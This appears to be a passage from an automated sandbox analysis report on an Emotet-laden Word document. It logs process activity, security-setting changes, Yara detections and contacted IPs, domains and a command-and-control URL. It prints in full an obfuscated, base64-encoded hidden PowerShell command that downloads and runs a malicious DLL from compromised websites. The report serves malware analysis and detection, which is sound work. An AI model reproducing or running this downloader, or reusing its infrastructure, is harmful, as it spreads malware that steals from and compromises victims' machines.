KwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsA
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK Jump to behavior
Source: rundll32.exe, 0000000E.00000002.470861626.0000000003830000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: rundll32.exe, 0000000E.00000002.470861626.0000000003830000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 0000000E.00000002.470861626.0000000003830000.00000002.00000001.sdmp Binary or memory string: Progman
Source: rundll32.exe, 0000000E.00000002.470861626.0000000003830000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10003D00 cpuid 13_2_10003D00
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 13_2_1002A1D1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 13_2_100303BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 13_2_10030661
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 13_2_100306CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 13_2_10029719
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 13_2_10030765
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 13_2_100298AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 13_2_10030B69
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 13_2_10030D3E
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1002A210 GetSystemTimeAsFileTime, 13_2_1002A210
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_100012B1 GetVersionExA,CreateWindowExA,ShowWindow,UpdateWindow, 13_2_100012B1
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval Jump to behavior
AV process strings found (often used to terminate AV products)
Source: svchost.exe, 00000013.00000002.469858560.00000251E1E3D000.00000004.00000001.sdmp Binary or memory string: @V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000013.00000002.469925075.00000251E1F02000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Stealing of Sensitive Information:

barindex
Yara detected Emotet
Source: Yara match File source: 0000000D.00000002.284787283.00000000029E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.470768632.0000000003410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.470794872.0000000003431000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.284845000.00000000041B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 14.2.rundll32.exe.3410000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.3410000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.29e0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.29e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.41b0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.3430000.3.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 336937 Sample: Informacion_29.doc Startdate: 07/01/2021 Architecture: WINDOWS Score: 100 60 Multi AV Scanner detection for domain / URL 2->60 62 Multi AV Scanner detection for dropped file 2->62 64 Multi AV Scanner detection for submitted file 2->64 66 12 other signatures 2->66 9 cmd.exe 1 2->9         started        12 svchost.exe 2->12         started        14 WINWORD.EXE 39 39 2->14         started        17 7 other processes 2->17 process3 dnsIp4 74 Suspicious powershell command line found 9->74 76 Very long command line found 9->76 78 Encrypted powershell cmdline option found 9->78 80 PowerShell case anomaly found 9->80 20 powershell.exe 14 19 9->20         started        25 conhost.exe 9->25         started        27 msg.exe 1 9->27         started        82 Changes security center settings (notifications, updates, antivirus, firewall) 12->82 29 MpCmdRun.exe 1 12->29         started        44 C:\Users\user\...\Informacion_29.doc.LNK, MS 14->44 dropped 46 127.0.0.1 unknown unknown 17->46 file5 signatures6 process7 dnsIp8 48 rycomputer.com 58.97.195.135, 443, 49722 TRUEINTERNET-AS-APTRUEINTERNETCoLtdTH Bangladesh 20->48 50 wheelcomoving.com 66.85.46.76, 49711, 80 HOST4GEEKS-LLCUS United States 20->50 52 3 other IPs or domains 20->52 42 C:\Users\user42sghohtbehaviorgraphbh5r9o\Q27V.dll, PE32 20->42 dropped 70 Powershell drops PE file 20->70 31 rundll32.exe 20->31         started        33 conhost.exe 29->33         started        file9 signatures10 process11 process12 35 rundll32.exe 2 31->35         started        signatures13 68 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->68 38 rundll32.exe 12 35->38         started        process14 dnsIp15 54 152.170.79.100, 80 TelecomArgentinaSAAR Argentina 38->54 56 190.247.139.101, 80 TelecomArgentinaSAAR Argentina 38->56 58 138.197.99.250, 49755, 8080 DIGITALOCEAN-ASNUS United States 38->58 72 System process connects to network (likely due to code injection or exploit) 38->72 signatures16
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
66.85.46.76
 unknown United States
393960 HOST4GEEKS-LLCUS true
152.170.79.100
 unknown Argentina
10318 TelecomArgentinaSAAR true
58.97.195.135
 unknown Bangladesh
7470 TRUEINTERNET-AS-APTRUEINTERNETCoLtdTH true
190.247.139.101
 unknown Argentina
10318 TelecomArgentinaSAAR true
35.214.169.246
 unknown United States
19527 GOOGLE-2US true
193.187.117.26
 unknown Netherlands
55933 CLOUDIE-AS-APCloudieLimitedHK true
70.32.23.58
 unknown United States
55293 A2HOSTINGUS true
138.197.99.250
 unknown United States
14061 DIGITALOCEAN-ASNUS true

Private
IP
127.0.0.1

Contacted Domains

Name IP Active
rycomputer.com 58.97.195.135 true
00zyku.com 193.187.117.26 true
wheelcomoving.com 66.85.46.76 true
d-cem.com 35.214.169.246 true
ketoresetme.com 70.32.23.58 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://138.197.99.250:8080/pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5jeelwiaa1pjy12utx/ true
  • Avira URL Cloud: safe
 unknown